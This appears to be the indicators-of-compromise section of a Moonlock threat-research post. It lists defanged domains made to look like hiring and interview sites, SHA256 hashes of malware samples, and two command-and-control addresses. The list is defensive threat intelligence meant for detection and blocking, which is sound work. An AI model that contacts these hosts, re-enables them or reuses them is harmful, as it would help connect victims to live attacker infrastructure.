 app.quickvidintro[.]com
 app.skill-share[.]org
 app.vidintroexam[.]com
 app.willo-interview[.]us
 app.willohiringtalent[.]org
 app.willorecruit[.]com
 app.willotalent[.]pro
 app.willotalentes[.]com
 app.willotalents[.]org
 blockchain-assess[.]com
 digitpotalent[.]com
 digitptalent[.]com
 fundcandidates[.]com
 hiringinterview[.]org
 hiringtalent[.]pro
 interviewnest[.]org
 smarthiretop[.]online
 talentcompetency[.]com
 topinnomastertech[.]com
 web.videoscreening[.]org
 willoassess[.]com
 willoassess[.]net
 willoassess[.]org
 willoassessment[.]com
 willocandidate[.]com
 willointerview[.]com
 willomexcvip[.]us
 winterviews[.]net
 winyourrole[.]com
 wtalents[.]in
 wtalents[.]us
 wholecryptoloom[.]com

SHA256

 b72653bf747b962c67a5999afbc1d9156e1758e4ad959412ed7385abaedb21b6
 60ec2dbe8cfacdff1d4eb093032b0307e52cc68feb1f67487d9f401017c3edd7
 5df555b868c08eed8fea2c5f1bc82c5972f2dd69159b2fdb6a8b40ab6d7a1830
 3c4becde20e618efb209f97581e9ab6bf00cbd63f51f4ebd5677e352c57e992a
 3210d821e12600eac1b9887860f4e63923f624643bc3c50b3600352166e66bfe
 b2a4a981ba7cc2add74737957efdfcbd123922653e3bb109aa7e88d70796a340
 3697852e593cec371245f6a7aaa388176e514b3e63813fdb136a0301969291ea
 0a49f0a8d0b1e856b7d109229dfee79212c10881dcc4011b98fe69fc28100182

C2

 hxxp://216.74.123.191:8080
 hxxp://95.169.180.146:8080










About the author

Moonlock (by MacPaw), @moonlock: cybersecurity tech for humans.
